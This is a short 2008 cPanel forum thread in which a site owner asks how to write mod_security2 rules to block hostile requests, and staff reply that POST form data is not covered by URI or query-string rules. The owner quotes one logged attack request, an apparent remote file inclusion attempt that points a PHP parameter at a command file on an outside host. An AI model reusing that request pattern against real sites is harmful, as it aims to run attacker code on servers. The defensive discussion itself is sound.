Please whitelist cPanel in your adblocker so that you’re able to see our version release promotions, thanks!

The Community Forums

Interact with an entire community of cPanel & WHM users!

HOW: Create my own mod_security2 rules?

Discussion in 'Security' started by SuperBaby, Jan 20, 2008.

  1. SuperBaby

    SuperBaby Well-Known Member

    Joined:
    Nov 27, 2003
    Messages:
    336
    Likes Received:
    0
    Trophy Points:
    166
    Location:
    Thailand
    cPanel Access Level:
    Website Owner
    Twitter:
    I checked my mod_security2 log file and see a lot of entries similar to this:

    GET /myfolder1/main.php?id=http://submitstation.de/xxxxxx/cmd.jpg

    How do I set up a mod_security2 rule so that the hacker is stopped when:

    1) He points his browser to my URL and the URL contain a specific word. In the above case, I would ban "submitstation.de".

    2) He submits a form from my site and the content contains a specific word.
     
    Stop hovering to collapse... Click to collapse... Hover to expand... Click to expand...
  2. cPDan

    cPDan cPanel Staff
    Staff Member

    Joined:
    Mar 9, 2004
    Messages:
    716
    Likes Received:
    8
    Trophy Points:
    243
  3. SuperBaby

    SuperBaby Well-Known Member

    Joined:
    Nov 27, 2003
    Messages:
    336
    Likes Received:
    0
    Trophy Points:
    166
    Location:
    Thailand
    cPanel Access Level:
    Website Owner
    Twitter:
    SecRule "REQUEST_URI|QUERY_STRING" "aaa|bbb"

    I added the rule above to mod_security2. It successfully forbid the access if the URL contains aaa or bbb. But it does not prevent aaa and bbb from a submission form.
     
    Stop hovering to collapse... Click to collapse... Hover to expand... Click to expand...
  4. cPDan

    cPDan cPanel Staff
    Staff Member

    Joined:
    Mar 9, 2004
    Messages:
    716
    Likes Received:
    8
    Trophy Points:
    243
    a form, at least via POSt is not part of the URI or QUERY_STRING, your best bet is to ask the mod security folks how to filter POST requests
     
  5. SuperBaby

    SuperBaby Well-Known Member

    Joined:
    Nov 27, 2003
    Messages:
    336
    Likes Received:
    0
    Trophy Points:
    166
    Location:
    Thailand
    cPanel Access Level:
    Website Owner
    Twitter:
    Stop hovering to collapse... Click to collapse... Hover to expand... Click to expand...
Loading...

Share This Page

  1. This site uses cookies to help personalise content, tailor your experience and to keep you logged in if you register.
    By continuing to use this site, you are consenting to our use of cookies.
    Dismiss Notice